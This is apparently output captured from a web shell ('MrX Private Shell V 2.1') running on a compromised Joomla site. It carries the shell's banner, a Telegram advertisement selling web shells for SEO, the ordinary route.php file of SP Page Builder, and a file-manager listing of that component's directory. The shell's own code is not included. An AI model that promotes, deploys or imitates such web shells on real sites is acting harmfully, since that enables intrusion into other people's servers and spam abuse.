__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* @package SP Page Builder
* @author JoomShaper http://www.joomshaper.com
* @copyright Copyright (c) 2010 - 2023 JoomShaper
* @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/
//no direct access
defined('_JEXEC') or die('Restricted access');
use Joomla\CMS\Factory;
use Joomla\CMS\Language\Multilanguage;
use \Joomla\CMS\Router\Route;
use Joomla\CMS\Uri\Uri;
abstract class SppagebuilderHelperRoute
{
public static function buildRoute($link)
{
// sh404sef
if (defined('SH404SEF_IS_RUNNING'))
{
return Uri::root() . $link;
}
// 4SEF
if (defined('4SEF_IS_RUNNING'))
{
return Uri::root() . $link;
}
return Route::link('site', $link, false, null);
}
// Get page route
public static function getPageRoute($id, $language = 0, $layout = null, $isPopup = false)
{
// Create the link
$link = 'index.php?option=com_sppagebuilder&view=page&id=' . $id;
if ($isPopup)
{
$link .= '&popup=1';
}
if ($language && $language !== '*' && Multilanguage::isEnabled())
{
$link .= '&lang=' . $language;
}
if ($layout)
{
$link .= '&layout=' . $layout;
}
if ($Itemid = self::getMenuItemId($id))
{
$link .= '&Itemid=' . $Itemid;
}
return self::buildRoute($link);
}
// Get form route
public static function getFormRoute($id, $language = 0, $Itemid = 0, $easyStoreRouteType = null, $isPopup = false)
{
$link = 'index.php?option=com_sppagebuilder&view=form&id=' . (int) $id;
if ($isPopup)
{
$link .= '&popup=1';
}
if ($language && $language !== '*' && Multilanguage::isEnabled())
{
$link .= '&lang=' . $language;
}
if ($Itemid != 0)
{
$link .= '&Itemid=' . $Itemid;
}
else
{
if (self::getMenuItemId($id))
{
$link .= '&Itemid=' . self::getMenuItemId($id);
}
}
if ($easyStoreRouteType !== null)
{
$link .= '&type=' . $easyStoreRouteType;
}
$link .= '&layout=edit&tmpl=component';
return self::buildRoute($link);
}
// get menu ID
private static function getMenuItemId($id)
{
$db = Factory::getDbo();
$query = $db->getQuery(true);
$query->select($db->quoteName(array('id')));
$query->from($db->quoteName('#__menu'));
$query->where($db->quoteName('link') . ' LIKE ' . $db->quote('%option=com_sppagebuilder&view=page&id=' . (int) $id . '%'));
$query->where($db->quoteName('published') . ' = ' . $db->quote('1'));
$db->setQuery($query);
$result = $db->loadResult();
if ($result)
{
return $result;
}
return;
}
}
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| tweet | Folder | 0775 |
|
|
| addon-helper.php | File | 8.71 KB | 0664 |
|
| ajax.php | File | 8.33 KB | 0664 |
|
| articles.php | File | 15.87 KB | 0664 |
|
| assets-css-parser.php | File | 1.97 KB | 0664 |
|
| auth-helper.php | File | 3.77 KB | 0664 |
|
| autoload.php | File | 3.21 KB | 0664 |
|
| constants.php | File | 322 B | 0664 |
|
| css-parser.php | File | 9.81 KB | 0664 |
|
| helper.php | File | 57.4 KB | 0664 |
|
| image.php | File | 2.98 KB | 0664 |
|
| integration-helper.php | File | 1.04 KB | 0664 |
|
| k2.php | File | 8.11 KB | 0664 |
|
| route.php | File | 2.44 KB | 0664 |
|